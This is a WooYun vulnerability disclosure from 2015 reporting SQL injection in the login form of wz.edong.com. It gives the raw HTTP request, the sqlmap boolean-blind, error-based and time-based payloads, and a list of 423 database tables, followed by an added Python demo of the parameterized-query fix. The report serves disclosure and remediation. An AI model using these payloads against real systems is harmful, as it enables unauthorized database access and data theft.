
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0133186

Title: SQL injection on an E动网 site

Vendor: 中国E动网

Author: 路人甲

Submitted: 2015-08-11 10:36

Fix time: 2015-08-16 10:38

Disclosure time: 2015-08-16 10:38

Type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: the vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:

Bookmarked by 4 users


Vulnerability details

Disclosure timeline:

2015-08-11: details sent to the vendor, awaiting vendor handling
2015-08-16: the vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

Detailed description:

http://wz.edong.com/

POST /index.php?a=checklogin&m=Users HTTP/1.1
Content-Length: 429
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=b65695a513516c3f7383b2e949f2ae17; __tsa___sid=121757005.1439207058369743571; __tsa__safe_nd=121757005.1439207092141
Host: wz.edong.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
password=g00dPa%24%24w0rD&username=1111&__hash__=bf1ede35e1b284d4092f5216df92a632_558433125d9b628bb2e8eb392d59d7b1

Injection point: the username parameter

[Screenshot: 2.png]

Proof of vulnerability:

423 tables:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: password=g00dPa$$w0rD&username=1111') RLIKE (SELECT (CASE WHEN (1138=1138) THEN 1111 ELSE 0x28 END)) AND ('FUzF'='FUzF&__hash__=bf1ede35e1b284d4092f5216df92a632_558433125d9b628bb2e8eb392d59d7b1
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: password=g00dPa$$w0rD&username=1111') AND (SELECT 8850 FROM(SELECT COUNT(*),CONCAT(0x716b6d6471,(SELECT (CASE WHEN (8850=8850) THEN 1 ELSE 0 END)),0x7163676971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('PUJn'='PUJn&__hash__=bf1ede35e1b284d4092f5216df92a632_558433125d9b628bb2e8eb392d59d7b1
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: password=g00dPa$$w0rD&username=1111') AND 6883=BENCHMARK(5000000,MD5(0x67454b6c)) AND ('pppf'='pppf&__hash__=bf1ede35e1b284d4092f5216df92a632_558433125d9b628bb2e8eb392d59d7b1
---
web application technology: Apache
back-end DBMS: MySQL 5.0
Database: wzedong007
[423 tables]
+-------------------------------------+
| wqy_access |
| wqy_adma |
| wqy_agent |
| wqy_agent_expenserecords |
| wqy_agent_function |
| wqy_agent_price |
| wqy_alipay_config |
| wqy_api |
| wqy_areply |
| wqy_article |
| wqy_attribute |
| wqy_baoming |
| wqy_baoming_list |
| wqy_baoming_order |
| wqy_behavior |
| wqy_busines |
| wqy_busines_comment |
| wqy_busines_main |
| wqy_busines_pic |
| wqy_busines_second |
| wqy_car |
| wqy_car_utility |
| wqy_carmodel |
| wqy_carnews |
| wqy_carowner |
| wqy_carsaler |
| wqy_carseries |
| wqy_carset |
| wqy_caruser |
| wqy_case |
| wqy_catemenu |
| wqy_classify |
| wqy_company |
| wqy_company_staff |
| wqy_cosmetology |
| wqy_cosmetology_departments |
| wqy_cosmetology_setup |
| wqy_cosmetology_setup_control |
| wqy_custom_field |
| wqy_custom_info |
| wqy_custom_limit |
| wqy_custom_set |
| wqy_czzreply_info |
| wqy_dati |
| wqy_dati_record |
| wqy_deliemail |
| wqy_delisms |
| wqy_diaoyan |
| wqy_diaoyan_timu |
| wqy_diaoyan_user |
| wqy_dining_table |
| wqy_dish |
| wqy_dish_company |
| wqy_dish_like |
| wqy_dish_order |
| wqy_dish_sort |
| wqy_dish_table |
| wqy_diyform |
| wqy_diyform_set |
| wqy_diymen_class |
| wqy_diymen_set |
| wqy_dream |
| wqy_estate |
| wqy_estate_album |
| wqy_estate_expert |
| wqy_estate_housetype |
| wqy_estate_impress |
| wqy_estate_impress_add |
| wqy_estate_son |
| wqy_fangchan |
| wqy_fangchan_reply |
| wqy_fenlei |
| wqy_fenlei_flash |
| wqy_fenlei_reply |
| wqy_fenlei_setcin |
| wqy_files |
| wqy_flash |
| wqy_forum_comment |
| wqy_forum_config |
| wqy_forum_message |
| wqy_forum_topics |
| wqy_function |
| wqy_gamereply_info |
| wqy_gametreply_info |
| wqy_gamettreply_info |
| wqy_goldegg |
| wqy_goldegg_record |
| wqy_greeting_card |
| wqy_heka |
| wqy_heka_list |
| wqy_home |
| wqy_home_background |
| wqy_host |
| wqy_host_list_add |
| wqy_host_order |
| wqy_hotels_house |
| wqy_hotels_house_sort |
| wqy_hotels_order |
| wqy_huadian |
| wqy_huadiancom |
| wqy_huadianphoto |
| wqy_huadianposter |
| wqy_huadiansub |
| wqy_huadianunits |
| wqy_huisuo_photo |
| wqy_hunqing |
| wqy_hunqingcom |
| wqy_hunqingphoto |
| wqy_hunqingposter |
| wqy_hunqingsub |
| wqy_hunqingunits |
| wqy_img |
| wqy_img_multi |
| wqy_indent |
| wqy_invites |
| wqy_invites_info |
| wqy_jianshen |
| wqy_jianshencom |
| wqy_jianshenphoto |
| wqy_jianshenposter |
| wqy_jianshensub |
| wqy_jianshenunits |
| wqy_jiaoyu |
| wqy_jiaoyucom |
| wqy_jiaoyuphoto |
| wqy_jiaoyuposter |
| wqy_jiaoyusub |
| wqy_jiaoyuunits |
| wqy_jiejing |
| wqy_jikedati |
| wqy_jikedati_flash |
| wqy_jikedati_reply |
| wqy_jikedati_setcin |
| wqy_jikedati_user |
| wqy_jiuba |
| wqy_jiubacom |
| wqy_jiubaphoto |
| wqy_jiubaposter |
| wqy_jiubasub |
| wqy_jiubaunits |
| wqy_kefu |
| wqy_keyword |
| wqy_ktv |
| wqy_ktv_photo |
| wqy_ktvcom |
| wqy_ktvphoto |
| wqy_ktvposter |
| wqy_ktvsub |
| wqy_ktvunits |
| wqy_leave |
| wqy_links |
| wqy_lottery |
| wqy_lottery_cheat |
| wqy_lottery_record |
| wqy_lvyou |
| wqy_lvyoucom |
| wqy_lvyouphoto |
| wqy_lvyouposter |
| wqy_lvyousub |
| wqy_lvyouunits |
| wqy_mail |
| wqy_market |
| wqy_market_area |
| wqy_market_cate |
| wqy_market_nav |
| wqy_market_park |
| wqy_market_slide |
| wqy_medical |
| wqy_medical_departments |
| wqy_medical_set |
| wqy_medical_setup |
| wqy_medical_setup_control |
| wqy_medical_user |
| wqy_meirong |
| wqy_meirong_album |
| wqy_meirong_expert |
| wqy_meirong_housetype |
| wqy_meirong_impress |
| wqy_meirong_impress_add |
| wqy_meirong_son |
| wqy_member |
| wqy_member_business |
| wqy_member_business_ad |
| wqy_member_business_case |
| wqy_member_business_fav |
| wqy_member_business_product |
| wqy_member_card_contact |
| wqy_member_card_coupon |
| wqy_member_card_create |
| wqy_member_card_custom |
| wqy_member_card_exchange |
| wqy_member_card_focus |
| wqy_member_card_info |
| wqy_member_card_integral |
| wqy_member_card_myintegral |
| wqy_member_card_notice |
| wqy_member_card_pay_record |
| wqy_member_card_set |
| wqy_member_card_sign |
| wqy_member_card_use_record |
| wqy_member_card_vip |
| wqy_member_wei_category |
| wqy_memberflash |
| wqy_moopha_article |
| wqy_moopha_attachement |
| wqy_moopha_channel |
| wqy_moopha_channel_contentattribute |
| wqy_moopha_keywords |
| wqy_moopha_picture |
| wqy_moopha_site |
| wqy_moopha_template |
| wqy_moopha_user |
| wqy_msg |
| wqy_nearby_user |
| wqy_node |
| wqy_norms |
| wqy_ordering_class |
| wqy_ordering_set |
| wqy_other |
| wqy_panorama |
| wqy_payment |
| wqy_photo |
| wqy_photo_list |
| wqy_pic_wall |
| wqy_pic_walllog |
| wqy_product |
| wqy_product_attribute |
| wqy_product_cart |
| wqy_product_cart_list |
| wqy_product_cat |
| wqy_product_comment |
| wqy_product_diningtable |
| wqy_product_image |
| wqy_product_mail_price |
| wqy_product_setting |
| wqy_quanxian |
| wqy_recipe |
| wqy_recognition |
| wqy_reply |
| wqy_reply_info |
| wqy_requestdata |
| wqy_research |
| wqy_research_answer |
| wqy_research_question |
| wqy_research_result |
| wqy_reservation |
| wqy_reservebook |
| wqy_rippleos_node |
| wqy_role |
| wqy_role_user |
| wqy_router |
| wqy_router_config |
| wqy_school_classify |
| wqy_school_score |
| wqy_school_set_index |
| wqy_school_students |
| wqy_school_tcourse |
| wqy_school_teachers |
| wqy_selfform |
| wqy_selfform_input |
| wqy_selfform_value |
| wqy_send_message |
| wqy_seo |
| wqy_service_logs |
| wqy_service_user |
| wqy_setinfo |
| wqy_shake |
| wqy_shakelog |
| wqy_share |
| wqy_share_set |
| wqy_shipin |
| wqy_shipincom |
| wqy_shipinphoto |
| wqy_shipinposter |
| wqy_shipinsub |
| wqy_shipinunits |
| wqy_sign_conf |
| wqy_sign_in |
| wqy_sign_set |
| wqy_site_plugmenu |
| wqy_sjmreply_info |
| wqy_sms_expendrecord |
| wqy_sms_record |
| wqy_snccode |
| wqy_sncode |
| wqy_storeflash |
| wqy_styleset |
| wqy_system_info |
| wqy_taobao |
| wqy_text |
| wqy_token_open |
| wqy_toshake |
| wqy_update_record |
| wqy_upyun_attachement |
| wqy_user |
| wqy_user_group |
| wqy_user_request |
| wqy_userinfo |
| wqy_users |
| wqy_vcard |
| wqy_vcard_list |
| wqy_voiceresponse |
| wqy_vote |
| wqy_vote_item |
| wqy_vote_record |
| wqy_wall |
| wqy_wall_member |
| wqy_wall_message |
| wqy_wall_prize_record |
| wqy_weather |
| wqy_wecha_user |
| wqy_wechat_group |
| wqy_wechat_group_list |
| wqy_wecht_grout |
| wqy_wedding |
| wqy_wedding_info |
| wqy_wehcat_member_enddate |
| wqy_weilivereply_info |
| wqy_weixin_ad |
| wqy_weixin_adboard |
| wqy_weixin_address |
| wqy_weixin_admin |
| wqy_weixin_admin_auth |
| wqy_weixin_admin_role |
| wqy_weixin_album |
| wqy_weixin_album_cate |
| wqy_weixin_album_comment |
| wqy_weixin_album_follow |
| wqy_weixin_album_item |
| wqy_weixin_alipay |
| wqy_weixin_article |
| wqy_weixin_article_cate |
| wqy_weixin_article_page |
| wqy_weixin_auto_user |
| wqy_weixin_badword |
| wqy_weixin_brandlist |
| wqy_weixin_custom_menu |
| wqy_weixin_delivery |
| wqy_weixin_flink |
| wqy_weixin_flink_cate |
| wqy_weixin_images |
| wqy_weixin_ipban |
| wqy_weixin_item |
| wqy_weixin_item_attr |
| wqy_weixin_item_cate |
| wqy_weixin_item_cate_tag |
| wqy_weixin_item_comment |
| wqy_weixin_item_img |
| wqy_weixin_item_like |
| wqy_weixin_item_order |
| wqy_weixin_item_orig |
| wqy_weixin_item_site |
| wqy_weixin_item_tag |
| wqy_weixin_keyword |
| wqy_weixin_mail_queue |
| wqy_weixin_menu |
| wqy_weixin_message |
| wqy_weixin_message_tpl |
| wqy_weixin_nav |
| wqy_weixin_oauth |
| wqy_weixin_order_detail |
| wqy_weixin_score_item |
| wqy_weixin_score_item_cate |
| wqy_weixin_score_log |
| wqy_weixin_score_order |
| wqy_weixin_setting |
| wqy_weixin_tag |
| wqy_weixin_topic |
| wqy_weixin_topic_at |
| wqy_weixin_topic_comment |
| wqy_weixin_topic_index |
| wqy_weixin_topic_relation |
| wqy_weixin_user |
| wqy_weixin_user_address |
| wqy_weixin_user_bind |
| wqy_weixin_user_follow |
| wqy_weixin_user_msgtip |
| wqy_weixin_user_stat |
| wqy_wifi |
| wqy_wuye |
| wqy_wuyecom |
| wqy_wuyephoto |
| wqy_wuyeposter |
| wqy_wuyesub |
| wqy_wuyeunits |
| wqy_wxuser |
| wqy_wxwall_award |
| wqy_wxwall_members |
| wqy_wxwall_message |
| wqy_yingyong |
| wqy_yingyong_reply |
| wqy_yml_config |
| wqy_yml_record |
| wqy_yuezhanreply_info |
| wqy_yuyue |
| wqy_yuyue_order |
| wqy_yuyue_setcin |
| wqy_yzdd |
| wqy_yzdd_record |
| wqy_yzdd_record_data |
| wqy_yzddtk |
| wqy_zhaopin |
| wqy_zhaopin_jianli |
| wqy_zhaopin_reply |
| wqy_zhengwu |
| wqy_zhengwucom |
| wqy_zhengwuphoto |
| wqy_zhengwuposter |
| wqy_zhengwusub |
| wqy_zhengwuunits |
| wqy_zhida |
| wqy_zhuangxiu |
| wqy_zhuangxiu_album |
| wqy_zhuangxiu_expert |
| wqy_zhuangxiu_housetype |
| wqy_zhuangxiu_impress |
| wqy_zhuangxiu_impress_add |
| wqy_zhuangxiu_son |
| wqy_zhuangxiucom |
| wqy_zhuangxiuphoto |
| wqy_zhuangxiuposter |
| wqy_zhuangxiusub |
| wqy_zhuangxiuunits |
+-------------------------------------+

Fix recommendation:

Copyright notice: when reposting, please credit the source: 路人甲@乌云
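The report leaves the fix section empty, so the following is an added example (not code from the original report or from the vendor's application) showing why the login check is injectable and what the remedy looks like. The query shape `WHERE (username = '...') AND (password = '...')` is an assumption inferred from the `')` / `('` framing of the sqlmap payloads above; the user table and the account in it are constructed for the demonstration. The RLIKE/CASE part of the payload is dropped and only the true/false tail (`AND ('FUzF'='FUzF`) is kept, which is enough to show the boolean oracle sqlmap relies on: with string concatenation the injected condition is evaluated by the database, so the true and false variants behave differently; with a parameterized query both are compared as literal usernames and behave identically.

```python
import sqlite3

# Constructed sample data for the demonstration only; nothing here comes from
# the real site. The plaintext password is a simplification (hash in practice).
SAMPLE_USERS = [("1111", "g00dPa$$w0rD")]

# Boolean-blind tails in the shape reported on the page:
# username=1111') ... AND ('FUzF'='FUzF   (true)   vs a false variant.
TRUE_TAIL = "1111') AND ('FUzF'='FUzF"
FALSE_TAIL = "1111') AND ('FUzF'='XXXX"


def make_db():
    """In-memory SQLite stand-in for the MySQL users table (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def checklogin_vulnerable(conn, username, password):
    """Assumed shape of the original check: values spliced into the SQL text.
    Quotes and keywords in the input become part of the statement."""
    sql = ("SELECT username FROM users WHERE (username = '%s') "
           "AND (password = '%s')" % (username, password))
    return conn.execute(sql).fetchone()


def checklogin_fixed(conn, username, password):
    """Hardened check: placeholders send the values separately from the SQL
    text, so the input is compared as data and never parsed as SQL."""
    sql = ("SELECT username FROM users WHERE (username = ?) "
           "AND (password = ?)")
    return conn.execute(sql, (username, password)).fetchone()


def blind_oracle(login):
    """True when the true/false tails give different results, i.e. the
    database evaluated the injected condition. This is the signal a
    boolean-based blind scan looks for; the fixed version yields no signal."""
    conn = make_db()
    on_true = login(conn, TRUE_TAIL, "g00dPa$$w0rD")
    on_false = login(conn, FALSE_TAIL, "g00dPa$$w0rD")
    return on_true != on_false


if __name__ == "__main__":
    print("vulnerable query leaks a boolean oracle:", blind_oracle(checklogin_vulnerable))
    print("parameterized query leaks a boolean oracle:", blind_oracle(checklogin_fixed))
    print("legitimate login still works:", checklogin_fixed(make_db(), "1111", "g00dPa$$w0rD"))
```

The same placeholder approach applies to MySQL through mysqli or PDO prepared statements in PHP; escaping or filtering the input is not a substitute, because it has to anticipate every syntax the database accepts (the three payload types above show the scanner trying several). Parameterizing the statement also removes the error-based and time-based variants, since the input can no longer reach the SQL parser at all.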


Responses

Vendor response:

Severity: no impact, ignored by vendor

Ignored at: 2015-08-16 10:38

Vendor reply:

Rank: 4 (WooYun rating)

Latest status:

None yet

